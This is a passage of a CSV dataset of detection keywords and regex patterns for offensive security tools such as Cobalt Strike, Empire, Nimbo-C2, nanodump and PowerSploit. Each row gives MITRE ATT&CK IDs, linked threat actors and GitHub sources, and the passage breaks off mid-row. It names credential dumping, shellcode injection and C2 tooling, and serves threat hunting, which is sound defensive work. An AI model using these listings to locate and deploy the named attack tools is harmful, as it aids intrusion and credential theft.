"*wrap_get_clipboard*",".{0,1000}wrap_get_clipboard.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","63060"
"*wrap_inject_shellc*",".{0,1000}wrap_inject_shellc.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","63061"
"*wrap_load_memfd*",".{0,1000}wrap_load_memfd.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","63062"
"*wrap_unhook_ntdll*",".{0,1000}wrap_unhook_ntdll.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","63063"
"*Write Dll buffer into remote memory*",".{0,1000}Write\sDll\sbuffer\sinto\sremote\smemory.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","0","N/A","N/A","9","6","532","108","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z","63064"
"*write_cs_teamserver*",".{0,1000}write_cs_teamserver.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","63067"
"*write_payload_dll_transacted*",".{0,1000}write_payload_dll_transacted.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","63068"
"*write_what_where.py*",".{0,1000}write_what_where\.py.{0,1000}","offensive_tool_keyword","POC","POC to check for CVE-2020-0796 / SMBGhost","T1210.001 - T1213 - T1212 - T1201","TA0007 - TA0002","N/A","N/A","Exploitation tool","https://github.com/ZecOps/CVE-2020-0796-LPE-POC","1","1","N/A","N/A","N/A","3","241","85","2020-04-02T08:01:38Z","2020-03-30T16:06:50Z","63069"
"*WriteAndExecuteShellcode*",".{0,1000}WriteAndExecuteShellcode.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","N/A","10","10","761","139","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z","63070"
"*Write-CMDServiceBinary*",".{0,1000}Write\-CMDServiceBinary.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","63071"
"*WriteDLLPermission.txt*",".{0,1000}WriteDLLPermission\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","63072"
"*writefile_bcpxpcmdshell.sql*",".{0,1000}writefile_bcpxpcmdshell\.sql.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","0","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","63073"
"*Write-HijackDll -OutputFile*",".{0,1000}Write\-HijackDll\s\-OutputFile.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","63074"
"*Write-HijackDll*",".{0,1000}Write\-HijackDll.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-BypassUAC.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","63075"
"*Write-HijackDll*",".{0,1000}Write\-HijackDll.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","PowerUp.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","63076"
"*Write-HijackDll*",".{0,1000}Write\-HijackDll.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","63077"
"*Write-HijackDll*",".{0,1000}Write\-HijackDll.{0,1000}","offensive_tool_keyword","PickleC2","PickleC2 is a post-exploitation and Lateral Movements framework","T1059.006 - T1021 - T1071 - T1550 - T1560 - T1570","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/xRET2pwn/PickleC2","1","0","N/A","N/A","10","10","91","20","2021-07-26T21:12:04Z","2021-07-13T09:16:19Z","63078"
"*Write-HijackDll*",".{0,1000}Write\-HijackDll.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","63079"
"*Write-Host ('Hel'+'lo Wo'+'rld!')*",".{0,1000}Write\-Host\s\(\'Hel\'\+\'lo\sWo\'\+\'rld!\'\).{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","#content","N/A","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","63080"
"*Write-Host -ForegroundColor Yellow ""IPPrint C2 Server""*",".{0,1000}Write\-Host\s\-ForegroundColor\sYellow\s\""IPPrint\sC2\sServer\"".{0,1000}","offensive_tool_keyword","IPPrintC2","PoC for using MS Windows printers for persistence / command and control via Internet Printing","T1090 - T1133 - T1547.012 - T1572","TA0011 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/Diverto/IPPrintC2","1","0","N/A","lolc2","10","10","146","20","2024-05-03T11:13:38Z","2024-05-03T09:13:10Z","63081"
"*Write-Nessus-Finding*",".{0,1000}Write\-Nessus\-Finding.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","0","N/A","N/A","5","4","389","106","2025-04-08T06:17:54Z","2018-04-20T11:29:06Z","63083"
"*Write-Nessus-Footer*",".{0,1000}Write\-Nessus\-Footer.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","0","N/A","N/A","5","4","389","106","2025-04-08T06:17:54Z","2018-04-20T11:29:06Z","63084"
"*Write-Nessus-Header*",".{0,1000}Write\-Nessus\-Header.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","0","N/A","N/A","5","4","389","106","2025-04-08T06:17:54Z","2018-04-20T11:29:06Z","63085"
"*Write-Output 127.0.0.1:1111*",".{0,1000}Write\-Output\s127\.0\.0\.1\:1111.{0,1000}","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/openbullet/OpenBullet2","1","0","N/A","N/A","10","10","1953","518","2025-03-16T10:50:26Z","2020-04-23T14:04:16Z","63086"
"*WritePayloadDll(LPWSTR pwszDllPath)*",".{0,1000}WritePayloadDll\(LPWSTR\spwszDllPath\).{0,1000}","offensive_tool_keyword","Perfusion","Exploit for the RpcEptMapper registry key permissions vulnerability (Windows 7 / 2088R2 / 8 / 2012)","T1068 - T1055 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/Perfusion","1","0","N/A","N/A","10","5","419","75","2021-04-22T16:20:32Z","2021-02-11T18:28:22Z","63087"
"*WritePayloadDllTransacted*",".{0,1000}WritePayloadDllTransacted.{0,1000}","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EspressoCake/PPLDump_BOF","1","1","N/A","N/A","10","10","140","25","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z","63088"
"*Write-PortscanOut*",".{0,1000}Write\-PortscanOut.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","63089"
"*Write-PrivescCheckAsciiReport*",".{0,1000}Write\-PrivescCheckAsciiReport.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","63090"
"*Write-ServiceBinary*",".{0,1000}Write\-ServiceBinary.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Exploit an unquoted service path vulnerability to spawn a beacon","T1550 - T1555 - T1212 - T1558","N/A","N/A","Black Basta","Exploitation tool","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","63091"
"*Write-ServiceEXE *",".{0,1000}Write\-ServiceEXE\s.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","63092"
"*Write-ServiceEXECMD*",".{0,1000}Write\-ServiceEXECMD.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black 